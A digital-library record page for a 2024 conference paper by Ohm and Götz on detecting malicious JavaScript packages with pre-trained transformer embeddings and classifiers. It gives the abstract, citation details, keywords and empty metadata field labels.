Using Pre-trained Transformers to Detect Malicious Source Code Within JavaScript Packages

The proliferation of open source software reuse has led to a significant increase in software supply chain attacks, making it increasingly challenging to identify malicious packages amidst the sheer volume of available packages. Traditional static analysis methods often fall short in detecting these threats due to the complexity and diversity of code semantics. This paper addresses these challenges by leveraging the remarkable success of transformer models in understanding code semantics. We propose a novel approach that utilizes pre-trained transformer models to embed source code, followed by training classifiers on these embeddings. This methodology enables a more nuanced understanding of code semantics, significantly improving the detection of malicious packages. Through extensive experiments, our approach achieves F1-scores as high as 0.98 and an alert rate of 0.09%, demonstrating its effectiveness in detecting malicious code within open source software supply chains.

Ohm, Marc; Götz, Anja (2024): Using Pre-trained Transformers to Detect Malicious Source Code Within JavaScript Packages. INFORMATIK 2024. DOI: 10.18420/inf2024_40. Bonn: Gesellschaft für Informatik e.V.. ISSN: 2944-7682. PISSN: 1617-5468. EISSN: 2944-7682. ISBN: 978-3-88579-746-3. pp. 529-538. Safety in Bytes. Wiesbaden. 24.-26. September 2024

Schlagwörter

Transformers , Malicious Packages , Software Supply Chain

DOI

10.18420/inf2024_40

Sammlungen

P352 - INFORMATIK 2024 - Lock in or log out? Wie digitale Souveränität gelingt

Komplettanzeige

Using Pre-trained Transformers to Detect Malicious Source Code Within JavaScript Packages

Volltext URI

Dokumententyp

Dateien

Zusatzinformation

Datum

Autor:innen

Zeitschriftentitel

ISSN der Zeitschrift

Bandtitel

Quelle

Verlag

Zusammenfassung

Beschreibung

Schlagwörter

Zitierform

DOI

Tags

Sammlungen